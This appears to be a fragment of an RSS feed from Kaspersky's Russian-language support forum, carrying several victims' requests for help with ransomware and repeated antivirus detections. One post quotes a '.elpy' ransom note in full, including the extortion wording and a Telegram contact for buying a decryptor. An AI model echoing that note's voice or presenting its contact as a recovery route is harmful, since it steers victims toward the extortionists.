	<a class="ipsAttachLink ipsAttachLink_image" href="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-03-01_00-27-46.png.af96a6e0800fa3385178b6d868ab5f19.png" data-fileid="37851" data-fileext="png" rel=""><img alt="2026-03-01_00-27-46.png" class="ipsImage ipsImage_thumbnailed" data-fileid="37851" data-ratio="53.8" style="height:auto;" width="500" data-src="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-03-01_00-27-46.thumb.png.540af3337ca62377c2ff2793fafe24b6.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>
]]></description><guid isPermaLink="false">58294</guid><pubDate>Sat, 28 Feb 2026 21:30:58 +0000</pubDate></item><item><title>&#x432;&#x438;&#x440;&#x443;&#x441;&#x44B; &#x438;&#x43B;&#x438; &#x43D;&#x435;&#x442; ?</title><link>https://forum.kaspersky.com/topic/%D0%B2%D0%B8%D1%80%D1%83%D1%81%D1%8B-%D0%B8%D0%BB%D0%B8-%D0%BD%D0%B5%D1%82-58150/</link><description><![CDATA[<p>
	у меня виндовс 11 24h2. kaspersky standart. И уже как неделю мне говорят что обнаружены объекты. я их удаляю( я их удалял уже 4 раза) и они заново появляются, вообще не знаю что делать. И еще пишет not a virus. помогите пожалуйста. Заранее спасибо<br />
	 
</p>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_02/ds.png.0aa0a76d3e22fbfe681efebf361ecc6c.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="37556" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_02/ds.thumb.png.7f51f4ec98b11836ae98876a7533c194.png" data-ratio="58" width="500" class="ipsImage ipsImage_thumbnailed" alt="ds.png"></a></p>
<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_02/1775303205_.png.bbe1883a5260302277db4ddc249e0d23.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="37557" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_02/1775303205_.png.bbe1883a5260302277db4ddc249e0d23.png" data-ratio="101.57" width="445" class="ipsImage ipsImage_thumbnailed" alt="ааа.png"></a></p>
<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_02/gf.png.30b34061992b72bba8ff380af132b12b.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="37558" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_02/gf.thumb.png.b56335e9ecf3ef4f2215f461b667f944.png" data-ratio="71.8" width="500" class="ipsImage ipsImage_thumbnailed" alt="gf.png"></a></p>]]></description><guid isPermaLink="false">58150</guid><pubDate>Mon, 09 Feb 2026 12:31:19 +0000</pubDate></item><item><title>&#x412;&#x438;&#x440;&#x443;&#x441; &#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x43B;&#x44C;&#x449;&#x438;&#x43A; &#x441; &#x440;&#x430;&#x441;&#x448;&#x438;&#x440;&#x435;&#x43D;&#x438;&#x435;&#x43C; elpy</title><link>https://forum.kaspersky.com/topic/%D0%B2%D0%B8%D1%80%D1%83%D1%81-%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D1%8C%D1%89%D0%B8%D0%BA-%D1%81-%D1%80%D0%B0%D1%81%D1%88%D0%B8%D1%80%D0%B5%D0%BD%D0%B8%D0%B5%D0%BC-elpy-58123/</link><description><![CDATA[<p>
	Вирус шифровальщик создает файлы с расширением elpy.
</p>

<p>
	Примеры:
</p>

<p>
	Принтер.docx.<strong>elpy</strong>-wVOhPhtsgHasQjUuxK2CZylS3H2vq3g8j11gqTs-<strong>IC8</strong>
</p>

<p>
	3V Sigma_ADD_2022 New.pdf.<strong>elpy</strong>-wVOhPhtsgHasQjUuxK2CZylS3H2vq3g8j11gqTs-<strong>IC8</strong>
</p>

<p>
	 
</p>

<p>
	В файле DECRYPT_FILES.txt содержится информация:
</p>

<p>
	Hello my dear friend (Do not scan the files with antivirus in any case. In case of data loss, the consequences are yours)<br />
	Your data is encrypted<br />
	Your decryption ID is wVOhPhtsgHasQjUuxK2CZylS3H2vq3g8j11gqTs-IC8*elpy-wVOhPhtsgHasQjUuxK2CZylS3H2vq3g8j11gqTs-IC8<br />
	Unfortunately for you, a major IT security weakness left you open to attack, your files have been encrypted<br />
	The only method of recovering files is to purchase decrypt tool and unique key for you.<br />
	If you want to recover your files, write us<br />
	1) eMail - *****@*****.tld<br />
	2) Telegram - @DataSupport911 or <span>https: //t.me/DataSupport911</span>
</p>

<p>
	Attention!
</p>

<p>
	Do not rename encrypted files. <br />
	Do not try to decrypt your data using third party software - it may cause permanent data loss. <br />
	We are always ready to cooperate and find the best way to solve your problem. <br />
	The faster you write - the more favorable conditions will be for you. <br />
	Our company values its reputation. We give all guarantees of your files decryption.
</p>

<p>
	 
</p>

<p>
	Подскажите как бороться с этим шифровальщиком?
</p>

<p>
	 
</p>

<p>
	 
</p>
]]></description><guid isPermaLink="false">58123</guid><pubDate>Thu, 05 Feb 2026 22:03:47 +0000</pubDate></item><item><title>&#x428;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x43B;&#x44C;&#x449;&#x438;&#x43A; &#x43F;&#x43E;&#x43F;&#x430;&#x43B; &#x432;  &#x43E;&#x440;&#x433;&#x430;&#x43D;&#x438;&#x437;&#x430;&#x446;&#x438;&#x44E;!</title><link>https://forum.kaspersky.com/topic/%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D1%8C%D1%89%D0%B8%D0%BA-%D0%BF%D0%BE%D0%BF%D0%B0%D0%BB-%D0%B2-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8E-58076/</link><description><![CDATA[<p>
	Добрый день! 
</p>

<p>
	Сегодня ночью подверглись атаке шифровальщика. Разрушил всё! Начиная с файлов (частично) заканчивая бекапами и базами данных, а так же виртуальные машины. Просьба написать, какие данные скинуть для анализа, возможно уже был похожий кейс. А, и ещё, в организации нашей установлен корпоративный Касперский.
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" data-fileext="png" data-fileid="37392" href="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-02-01153528.png.27c71130e895cc337bcfcc8ef1c8ca71.png" rel=""><img alt="Снимок экрана 2026-02-01 153528.png" class="ipsImage ipsImage_thumbnailed" data-fileid="37392" data-ratio="94.2" style="height:auto;" width="500" data-src="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-02-01153528.thumb.png.8f18c112c85959188ea883c4ba9a3151.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>
]]></description><guid isPermaLink="false">58076</guid><pubDate>Sun, 01 Feb 2026 12:34:28 +0000</pubDate></item><item><title>&#x41C;&#x43E;&#x436;&#x43D;&#x43E; &#x43B;&#x438; &#x43F;&#x43E;&#x434;&#x43A;&#x43B;&#x44E;&#x447;&#x438;&#x442;&#x44C; SSD &#x43E;&#x442; &#x437;&#x430;&#x440;&#x430;&#x436;&#x435;&#x43D;&#x43D;&#x43E;&#x433;&#x43E; &#x43A;&#x43E;&#x43C;&#x43F;&#x44C;&#x44E;&#x442;&#x435;&#x440;&#x430; &#x43A; &#x434;&#x440;&#x443;&#x433;&#x43E;&#x43C;&#x443; &#x43A;&#x43E;&#x43C;&#x43F;&#x44C;&#x44E;&#x442;&#x435;&#x440;&#x443; &#x447;&#x442;&#x43E; &#x431;&#x44B; &#x435;&#x433;&#x43E; &#x43F;&#x43E;&#x447;&#x438;&#x441;&#x442;&#x438;&#x43B; &#x41A;&#x430;&#x441;&#x43F;&#x435;&#x440;&#x441;&#x43A;&#x438;&#x439;?</title><link>https://forum.kaspersky.com/topic/%D0%BC%D0%BE%D0%B6%D0%BD%D0%BE-%D0%BB%D0%B8-%D0%BF%D0%BE%D0%B4%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D1%8C-ssd-%D0%BE%D1%82-%D0%B7%D0%B0%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BA%D0%BE%D0%BC%D0%BF%D1%8C%D1%8E%D1%82%D0%B5%D1%80%D0%B0-%D0%BA-%D0%B4%D1%80%D1%83%D0%B3%D0%BE%D0%BC%D1%83-%D0%BA%D0%BE%D0%BC%D0%BF%D1%8C%D1%8E%D1%82%D0%B5%D1%80%D1%83-%D1%87%D1%82%D0%BE-%D0%B1%D1%8B-%D0%B5%D0%B3%D0%BE-%D0%BF%D0%BE%D1%87%D0%B8%D1%81%D1%82%D0%B8%D0%BB-%D0%BA%D0%B0%D1%81%D0%BF%D0%B5%D1%80%D1%81%D0%BA%D0%B8%D0%B9-57963/</link><description><![CDATA[<p>
	Не очень хочется чтобы вирус перекинулся на другой компьютер и снова снес BIOS на 2 компьютере
</p>
]]></description><guid isPermaLink="false">57963</guid><pubDate>Tue, 20 Jan 2026 13:32:31 +0000</pubDate></item><item><title>&#x428;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x43B;&#x44C;&#x449;&#x438;&#x43A;</title><link>https://forum.kaspersky.com/topic/%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D1%8C%D1%89%D0%B8%D0%BA-57959/</link><description><![CDATA[<p>
	Зашифрованы большинство компьютеров в локальной сети<a class="ipsAttachLink ipsAttachLink_image" href="https://forum.kaspersky.com/uploads/monthly_2026_01/1050353928_.png.46cceff8a7d75f6a7a2446219f156740.png" data-fileid="37210" data-fileext="png" rel=""><img class="ipsImage ipsImage_thumbnailed" data-fileid="37210" data-ratio="50.60" width="500" alt=".thumb.png.85170170fe69c7999cb2fe92c59c1f2a.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_01/.thumb.png.85170170fe69c7999cb2fe92c59c1f2a.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>
]]></description><guid isPermaLink="false">57959</guid><pubDate>Tue, 20 Jan 2026 06:41:50 +0000</pubDate></item></channel></rss>
